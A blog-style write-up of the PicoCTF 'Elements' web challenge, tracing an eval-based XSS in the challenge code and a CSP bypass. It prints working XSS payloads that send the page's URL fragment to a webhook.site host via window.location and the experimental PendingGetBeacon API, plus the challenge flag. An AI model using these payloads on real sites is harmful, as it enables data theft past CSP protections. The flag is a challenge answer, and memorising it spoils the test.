<!DOCTYPE html>
<html lang="en-US">
  <head>
    <meta charset='utf-8'>
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="/assets/css/style.css?v=e60aae304e72f02a09dbc4d6f1f78959d3c77b94">
    <!-- start custom head snippets, customize with your own _includes/head-custom.html file -->

<!-- Setup theme-color -->
<!-- start theme color meta headers -->
<meta name="theme-color" content="#151515">
<meta name="msapplication-navbutton-color" content="#151515">
<meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
<!-- end theme color meta headers -->


<!-- Setup Google Analytics -->



<!-- You can set your favicon here -->
<!-- link rel="shortcut icon" type="image/x-icon" href="/favicon.ico" -->

<!-- end custom head snippets -->


<!-- Begin Jekyll SEO tag v2.8.0 -->
<title>elements WU | HSw109</title>
<meta name="generator" content="Jekyll v3.10.0" />
<meta property="og:title" content="elements WU" />
<meta name="author" content="HSw109" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="Elements - PicoCTF" />
<meta property="og:description" content="Elements - PicoCTF" />
<link rel="canonical" href="http://localhost:4000/write-up/picoctf/2024/09/17/elements.html" />
<meta property="og:url" content="http://localhost:4000/write-up/picoctf/2024/09/17/elements.html" />
<meta property="og:site_name" content="HSw109" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2024-09-17T15:23:10+07:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="elements WU" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"HSw109"},"dateModified":"2024-09-17T15:23:10+07:00","datePublished":"2024-09-17T15:23:10+07:00","description":"Elements - PicoCTF","headline":"elements WU","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/write-up/picoctf/2024/09/17/elements.html"},"url":"http://localhost:4000/write-up/picoctf/2024/09/17/elements.html"}</script>
<!-- End Jekyll SEO tag -->

  </head>

  <body>

    <header>
      <div class="container">
        <a id="a-title" href="/">
          <h1>HSw109</h1>
        </a>
        <h2>just me hsw109</h2>

        <section id="downloads">
          <!--  -->
          <a href="http://localhost:4000/write-up" class="btn">Write-up</a>
          <a href="http://localhost:4000/about" class="btn">About</a>
          <a href="http://localhost:4000/guide" class="btn">Guide page</a>
          <a href="https://github.com/HSw109" class="btn btn-github"><span class="icon"></span>Github</a>

        </section>
      </div>
    </header>

    <div class="container">
      <section id="main_content">
        <small>17 September 2024</small>
<h1>elements WU</h1>

<p class="view">by HSw109</p>

<h1 id="elements---picoctf">Elements - PicoCTF</h1>

<h2 id="indexmjs">index.mjs</h2>
<h3 id="func-createserver">func createServer()</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>createServer((req, res) =&gt; {	
	const  url  =  new  URL(req.url, 'http://127.0.0.1');
	const  csp  = 
[
	"default-src 'none'",
	"style-src 'unsafe-inline'",
	"script-src 'unsafe-eval' 'self'",
	"frame-ancestors 'none'",
	"worker-src 'none'",
	"navigate-to 'none'"
]
</code></pre></div></div>

<p>Noteable that CSP (Content Secure Policy) allows that <code class="language-plaintext highlighter-rouge">"script-src 'unsafe-eval' 'self'"</code>. This means JS can use dangerous function like <code class="language-plaintext highlighter-rouge">eval(), setTimeOut(), ...</code> for executation.</p>

<p><code class="language-plaintext highlighter-rouge">"navigate-to 'none'"</code>  means that we can’t use navigation here (window.location, window.open …)</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>if (req.headers.host  !==  '127.0.0.1:8080') {
csp.push("connect-src https://elements.attest.lol/");
}
</code></pre></div></div>

<p>if host header is not 127.0.0.1:8080 =&gt; fetch from https://elements.attest.lol/. Afterwards, nothing special until this</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>else if (url.pathname === '/remoteCraft') {
try {
    const { recipe, xss } = JSON.parse(url.searchParams.get('recipe'));
    assert(typeof xss === 'string');
    assert(xss.length &lt; 300);
    assert(recipe instanceof Array);
    assert(recipe.length &lt; 50);
    for (const step of recipe) {
        assert(step instanceof Array);
        assert(step.length === 2);
        for (const element of step) {
            assert(typeof xss === 'string');
            assert(element.length &lt; 50);
        }
    }
    visit({ recipe, xss });
} catch(e) {
    console.error(e);
    return res.writeHead(400).end('invalid recipe!');
}
return res.end('visiting!'); }
</code></pre></div></div>

<p>In pathname /remoteCraft, we can put the parameter <strong>recipe</strong>  in the URL, then use function <em>assert()</em> to check the condition of parameter, if everything goes well =&gt; execute function <em>visit()</em></p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>const url1 = 'http://localhost:8080/remoteCraft?recipe={"recipe":[["Ash","Fire"]],"xss":"exampleString"}';
const url = new URL(url1);
const { recipe, xss } = JSON.parse(url.searchParams.get('recipe'));
console.log(recipe);
console.log(xss);
</code></pre></div></div>

<p>After use a small JS to see what input and output look likes.</p>

<blockquote>
  <p>So all what we need to do is modify the XSS part =&gt; Execute visit() =&gt; Get the flag of state object</p>
</blockquote>

<h3 id="func-visit">func visit()</h3>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> async function visit(state) {

if (visiting) return; 
	visiting = true;

state = { ...state, flag }; // inherit state object, and has attribute flag:
const userDataDir = await mkdtemp(join(tmpdir(), 'elements-')); // ex: /tmp/elements-r3k2P7

await mkdir(join(userDataDir, 'Default'));
await writeFile(join(userDataDir, 'Default', 'Preferences'), JSON.stringify({ // file JSON Preferences is stored at /tmp/elements-r3k2P7/Default/
    net: {
        network_prediction_options: 2 // content of preferences
    }
}));

const proc = spawn(
    '/usr/bin/chromium-browser-unstable', [
        `--user-data-dir=${userDataDir}`,
        '--profile-directory=Default',
        '--no-sandbox',
        '--js-flags=--noexpose_wasm,--jitless',
        '--disable-gpu',
        '--no-first-run',
        '--enable-experimental-web-platform-features',
        `http://127.0.0.1:8080/#${Buffer.from(JSON.stringify(state)).toString('base64')}` // contain recipe and xss attribute
    ],
    { detached: true } // ensures the spawned process will run independently of the parent process, meaning it won't be terminated if the parent process (the Node.js app) exits.
);

await sleep(10000);
try {
    process.kill(-proc.pid);
} catch (e) {}
await sleep(500);
await rm(userDataDir, { recursive: true, force: true, maxRetries: 10 });
visiting = false;
}
</code></pre></div></div>

<p>As we can see that visit function, the input object has been inherited all attribute, additional has new attribute which is our flag</p>

<table>
  <thead>
    <tr>
      <th>state</th>
      <th>new state</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>recipe: [[“Ash”,”Fire”],[“Water”,”Steam”]]</td>
      <td>recipe: [[“Ash”,”Fire”],[“Water”,”Steam”]]</td>
    </tr>
    <tr>
      <td>xss: ‘exampleString’</td>
      <td>xss: ‘exampleString’</td>
    </tr>
    <tr>
      <td> </td>
      <td>flag: picoCTF{test_flag}</td>
    </tr>
  </tbody>
</table>

<p>Then new process “chromium” and access <code class="language-plaintext highlighter-rouge">http://127.0.0.1:8080#${Buffer.from(JSON.stringify(state)).toString('base64')</code>
The arguments have its functionality but notable that:</p>

<ul>
  <li><code class="language-plaintext highlighter-rouge">--enable-experimental-web-platform-features</code> :  User can use experimental feature of chromium</li>
</ul>

<p>After that, the server sleep 10s then kill all process, then remove the temporary directory.</p>

<h2 id="indexjs">index.js</h2>

<p>After skimming, i see that vulnerable code that the back-end allow by CSP: <code class="language-plaintext highlighter-rouge">"script-src 'unsafe-eval' 'self'"</code></p>

<h3 id="func-evaluate">func evaluate()</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>const evaluate = (...items) =&gt; {
    const [a, b] = items.sort();
    for (const [ingredientA, ingredientB, result] of recipes) {
        if (ingredientA === a &amp;&amp; ingredientB == b) {
            if (result === 'XSS' &amp;&amp; state.xss) {
                eval(state.xss);                                            
            }
            return result;
        }
    }
    return null;
}
</code></pre></div></div>

<p>The function validate the elements, if its combined = “XSS” and JSON object <strong>“state”</strong> has attribute xss, then server execute it. This is the main part of this attack.</p>

<p>CTRL-F the this function, this only called in 2 another location: create() and last try/catch block. The function create() seems nothing special, just check the elements and if new element found, store it in a map found[].</p>

<h3 id="trycatch">try/catch()</h3>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>try {
    state = JSON.parse(atob(window.location.hash.slice(1)));
    for (const [a, b] of state.recipe) {
        if (!found.has(a) || !found.has(b)) {
            break;
        }
        const result = evaluate(a, b);
        found.set(result, elements.get(result));
    }
} catch(e) {}
</code></pre></div></div>

<p>There we have <strong>state</strong> is the JSON obj after base64 decoded <code class="language-plaintext highlighter-rouge">atob()</code>
 <code class="language-plaintext highlighter-rouge">window.location.hash.slice(1)</code> is taking the after “#” part of current URL.
  Example: http://example.com/#123abc if go on this func =&gt; 123abc</p>

<p>Then if statement check the ingredient element already founded =&gt; execute the <code class="language-plaintext highlighter-rouge">evaluate()</code> function and add result element to the founded map.</p>

<h2 id="exploit">Exploit</h2>

<p>So, i have to take my time for playing this game till i got XSS (waste of time) to met the condition of evaluate() function.</p>

<p>Take first step with simple payload: <code class="language-plaintext highlighter-rouge">{"recipe":[["Exploit","Web Design"]],"xss":"alert('1')"}</code>
=&gt; http://localhost:8080/#eyJyZWNpcGUiOltbIkV4cGxvaXQiLCJXZWIgRGVzaWduIl1dLCJ4c3MiOiJhbGVydCgnMScpIn0=</p>

<p>Its worked!</p>

<p>Chromium stored the attribute of <strong>state</strong> so i need to see content of state, this bring me to this payload:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>{"recipe":[["Exploit","Web Design"]],"xss":"let output='';for(const[key,value]of Object.entries(state)){output+=`${key}:${value}`;}alert(output);"}
</code></pre></div></div>

<p>Encode it and bring to the URL, also worked too! 
=&gt; recipe:Exploit,Web Designxss:let output=’‘;for(const[key,value]of Object.entries(state)){output+=<code class="language-plaintext highlighter-rouge">${key}:${value}</code>;}alert(output);</p>

<p>Its processing in Chromium, so i need something that return the flag to me. THAT WHY I USED WEBHOOK!</p>

<p>=&gt; payload: <code class="language-plaintext highlighter-rouge">http://localhost:8080/remoteCraft?recipe={"recipe":[["Exploit", "Web Design"]],"xss":"let output='';for(const[key,value]of Object.entries(state)){output+=`${key}:${value}`;};window.location = 'https://webhook.site/09e19f10-a88e-405c-b6c1-4870e0c497d5/?e=' + output"}</code></p>

<p>The Chromium processing, then</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>http://127.0.0.1:8080/#${Buffer.from(JSON.stringify(state)).toString('base64')} accessed by browser =&gt;  **evaluate()** executed =&gt; **eval()** execute =&gt; **XSS** !!!
</code></pre></div></div>

<p>Unfortunately, despite many tries, the webhook cant catch my request, then i realize that <code class="language-plaintext highlighter-rouge">"navigate-to 'none'"</code> in CSP  :(</p>

<p>After hours, i found that we can use <code class="language-plaintext highlighter-rouge">window.location.hash.slice(1)</code> again to get the flag, cause our location is indeed containing the flag. But we don’t have anything to return it.</p>

<p>So desperately, so i checked the solution…, then thing i missed is: <code class="language-plaintext highlighter-rouge">--enable-experimental-web-platform-features</code>. AISHHHH! im done, its so tricky, there are a API in testing Chrome Feature that is <strong>PendingBeacon</strong> class, which has PendingGetBeacon() API supports JavaScript. Normally the testing feature is not affected by the CSP.</p>

<p><a href="https://chromium.googlesource.com/chromium/src/+/refs/tags/107.0.5304.8/docs/experiments/page-unload-beacon.md">Here is the document</a></p>

<p>I have tried another API but its seem not work with this time.</p>

<p>=&gt; payload:  <code class="language-plaintext highlighter-rouge">http://localhost:8080/remoteCraft?recipe={"recipe":[["Exploit", "Web Design"]],"xss":"new PendingGetBeacon('https://webhook.site/09e19f10-a88e-405c-b6c1-4870e0c497d5/?e=' + window.location.hash.slice(1), {timeout: 1000});"}</code></p>

<p>Then we got base64 request from webhook:
<code class="language-plaintext highlighter-rouge">https://webhook.site/09e19f10-a88e-405c-b6c1-4870e0c497d5/?e=eyJyZWNpcGUiOltbIkV4cGxvaXQiLCJXZWIgRGVzaWduIl1dLCJ4c3MiOiJuZXcgUGVuZGluZ0dldEJlYWNvbignaHR0cHM6Ly93ZWJob29rLnNpdGUvMDllMTlmMTAtYTg4ZS00MDVjLWI2YzEtNDg3MGUwYzQ5N2Q1Lz9lPScgKyB3aW5kb3cubG9jYXRpb24uaGFzaC5zbGljZSgxKSwge3RpbWVvdXQ6IDEwMDB9KTsiLCJmbGFnIjoicGljb0NURntsaXR0bGVfYWxjaGVteV93YXNfdGhlXzBnX2dhbWVfZG9lc19hbnlvbmVfcmVtZW1iM3JfOTg4OWZkNGF9IGJ0dyBjb250YWN0IG1lIG9uIGRpc2NvcmQgd2l0aCB1ciBzb2x1dGlvbiB0aGFua3MgQGVoaHRoaW5nXG4ifQ==</code></p>

<p>Decode =&gt; Flag: picoCTF{little_alchemy_was_the_0g_game_does_anyone_rememb3r_9889fd4a}</p>




  <small>tags: <em>web</em></small>


      </section>
    </div>
  </body>
</html>
